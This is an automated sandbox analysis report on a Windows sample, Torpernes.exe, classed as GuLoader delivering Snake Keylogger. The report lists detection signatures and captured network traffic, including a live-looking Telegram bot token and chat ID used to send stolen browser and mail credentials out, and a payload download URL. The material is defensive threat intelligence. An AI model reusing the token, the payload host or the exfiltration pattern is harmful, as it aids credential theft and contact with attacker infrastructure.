Windows Analysis Report
Torpernes.exe

Overview

General Information

Sample name:	Torpernes.exe
Analysis ID:	1481480
MD5:	ecc4ff0ee7d123f0e90587ea3a7b9ae3
SHA1:	70e6f747f9bae57619817beb11f836fa8a873726
SHA256:	1e0a46fd7b7b0706d4d5918ba666abdcccc67be4be89874b5cb2ca9ea8b12a83
Tags:	exe
Infos:

Detection

GuLoader, Snake Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Yara detected GuLoader

Yara detected Snake Keylogger

Yara detected Telegram RAT

AI detected suspicious sample

Found suspicious powershell code related to unpacking or dynamic code loading

Powershell drops PE file

Sigma detected: Suspicious Script Execution From Temp Folder

Suspicious powershell command line found

Switches to a custom stack to bypass stack traces

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Writes to foreign memory regions

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to dynamically determine API calls

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Direct Autorun Keys Modification

Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Uses reg.exe to modify the Windows registry

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected Credential Stealer

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Signatures

AV Detection

Found malware configuration

Source: 00000006.00000002.2944378842.0000000020DE1000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7233802065:AAGhMGPQ0nLoLP2hx7_EW3TbcrrzChgxpJA/sendMessage?chat_id=5811709821"}
Source: Contentious.exe.7972.6.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7233802065:AAGhMGPQ0nLoLP2hx7_EW3TbcrrzChgxpJA/sendMessage"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_238291E0 CryptUnprotectData,		6_2_238291E0
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_23829941 CryptUnprotectData,		6_2_23829941

Uses 32bit PE files

Source: Torpernes.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown

HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49738 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 185.98.5.168:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49753 version: TLS 1.2

Source: Torpernes.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: ore.pdb source: powershell.exe, 00000001.00000002.2176303131.0000000006DE1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000001.00000002.2176303131.0000000006D84000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\Torpernes.exe	Code function: 0_2_0040615C FindFirstFileW,FindClose,	0_2_0040615C
Source: C:\Users\user\Desktop\Torpernes.exe	Code function: 0_2_004056A1 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_004056A1
Source: C:\Users\user\Desktop\Torpernes.exe	Code function: 0_2_00402770 FindFirstFileW,	0_2_00402770
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_0040615C FindFirstFileW,FindClose,	6_2_0040615C
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_00402770 FindFirstFileW,	6_2_00402770
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_004056A1 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	6_2_004056A1

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\Myrmecophile\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreringers\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 4x nop then jmp 0015FA39h	6_2_0015F778
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	6_2_0015E005
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 4x nop then jmp 0015E61Fh	6_2_0015E431
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 4x nop then jmp 0015EFA9h	6_2_0015E431
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	6_2_0015D7F0
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	6_2_0015DE23
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 4x nop then jmp 20CB15D8h	6_2_20CB11C0
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 4x nop then jmp 20CB1011h	6_2_20CB0D60
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 4x nop then jmp 20CBFB81h	6_2_20CBF8D8
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 4x nop then jmp 20CBF729h	6_2_20CBF480
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 4x nop then jmp 20CB0751h	6_2_20CB04A0
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 4x nop then jmp 20CBC761h	6_2_20CBC4B8
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 4x nop then jmp 20CB02F1h	6_2_20CB0040
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 4x nop then jmp 20CBC309h	6_2_20CBC060
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 4x nop then jmp 20CBBEB1h	6_2_20CBBC08
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 4x nop then jmp 20CBF2D1h	6_2_20CBF028
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 4x nop then jmp 20CBD469h	6_2_20CBD1C0
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 4x nop then jmp 20CB15D8h	6_2_20CB11B0
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 4x nop then jmp 20CBD011h	6_2_20CBCD68
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 4x nop then jmp 20CB0BB1h	6_2_20CB0900
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 4x nop then jmp 20CB15D8h	6_2_20CB1506
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 4x nop then jmp 20CBCBB9h	6_2_20CBC910
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 4x nop then jmp 20CBE171h	6_2_20CBDEC8
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 4x nop then jmp 20CBDD19h	6_2_20CBDA70
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 4x nop then jmp 20CBD8C1h	6_2_20CBD618
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 4x nop then jmp 20CBEE79h	6_2_20CBEBD0
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 4x nop then jmp 20CBBA59h	6_2_20CBB7B0
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 4x nop then jmp 20CBB601h	6_2_20CBB358
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 4x nop then jmp 20CBEA21h	6_2_20CBE778
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 4x nop then jmp 20CBB1A9h	6_2_20CBAF00
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 4x nop then jmp 20CBE5C9h	6_2_20CBE320
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 4x nop then jmp 238288EDh	6_2_238285B0
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 4x nop then jmp 23820741h	6_2_23820498
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 4x nop then jmp 238272A2h	6_2_23826FF8
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 4x nop then jmp 238269C9h	6_2_23826720
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	6_2_23823350
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	6_2_23823360
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 4x nop then jmp 23826E21h	6_2_23826B78
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 4x nop then jmp 23826571h	6_2_238262C8
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 4x nop then jmp 23825CC1h	6_2_23825A18
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 4x nop then jmp 23826119h	6_2_23825E70
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 4x nop then jmp 23825869h	6_2_238255C0
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 4x nop then jmp 23827FA9h	6_2_23827D00
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 4x nop then jmp 238253E9h	6_2_23825140
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 4x nop then jmp 23828401h	6_2_23828158
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 4x nop then jmp 23827B51h	6_2_238278A8
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 4x nop then jmp 23820B99h	6_2_238208F0
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 4x nop then jmp 238202E9h	6_2_23820040
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 4x nop then jmp 238276F9h	6_2_23827450

Networking

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7233802065:AAGhMGPQ0nLoLP2hx7_EW3TbcrrzChgxpJA/sendDocument?chat_id=5811709821&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcad4b8239f5aaHost: api.telegram.orgContent-Length: 547Connection: Keep-Alive

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 158.101.44.242 158.101.44.242

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

May check the online IP address of the machine

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /image/bwSNbczRiJIuD15.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: domzeleni.kzCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown

HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49738 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /image/bwSNbczRiJIuD15.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: domzeleni.kzCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: domzeleni.kz
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: unknown

HTTP traffic detected: POST /bot7233802065:AAGhMGPQ0nLoLP2hx7_EW3TbcrrzChgxpJA/sendDocument?chat_id=5811709821&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcad4b8239f5aaHost: api.telegram.orgContent-Length: 547Connection: Keep-Alive

Source: Contentious.exe, 00000006.00000002.2944378842.0000000021067000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: Contentious.exe, 00000006.00000002.2944378842.0000000020F9C000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F53000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F45000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F38000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020EA5000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F60000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F8D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: Contentious.exe, 00000006.00000002.2944378842.0000000020F9C000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020EE8000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F6E000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F53000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F45000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F38000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020E99000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020EA5000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F60000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F8D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: Contentious.exe, 00000006.00000002.2944378842.0000000020DE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: powershell.exe, 00000001.00000002.2177929958.0000000006E21000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.m
Source: Torpernes.exe, Contentious.exe.1.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000001.00000002.2173904529.000000000568D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000001.00000002.2171178295.0000000004776000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: Contentious.exe, 00000006.00000002.2944378842.0000000020EBD000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F9C000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F53000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F45000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F38000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F60000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F8D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.org
Source: powershell.exe, 00000001.00000002.2171178295.0000000004621000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020DE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.2171178295.0000000004776000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000001.00000002.2171178295.0000000004621000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: Contentious.exe, 00000006.00000002.2944378842.0000000021067000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: Contentious.exe, 00000006.00000002.2944378842.0000000021067000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: Contentious.exe, 00000006.00000002.2944378842.0000000021067000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7233802065:AAGhMGPQ0nLoLP2hx7_EW3TbcrrzChgxpJA/sendDocument?chat_id=5811
Source: powershell.exe, 00000001.00000002.2173904529.000000000568D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000001.00000002.2173904529.000000000568D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000001.00000002.2173904529.000000000568D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: Contentious.exe, 00000006.00000002.2928735040.0000000004A54000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://domzeleni.kz/
Source: Contentious.exe, 00000006.00000002.2943257213.00000000205A0000.00000004.00001000.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2928735040.0000000004A54000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://domzeleni.kz/image/bwSNbczRiJIuD15.bin
Source: Contentious.exe, 00000006.00000002.2928735040.0000000004A19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://domzeleni.kz/image/bwSNbczRiJIuD15.binB
Source: powershell.exe, 00000001.00000002.2171178295.0000000004776000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.2173904529.000000000568D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: Contentious.exe, 00000006.00000002.2944378842.0000000020F9C000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020EE8000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F53000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F45000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F38000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020EA5000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F60000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F8D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: Contentious.exe, 00000006.00000002.2944378842.0000000020EA5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: Contentious.exe, 00000006.00000002.2944378842.0000000020F8D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
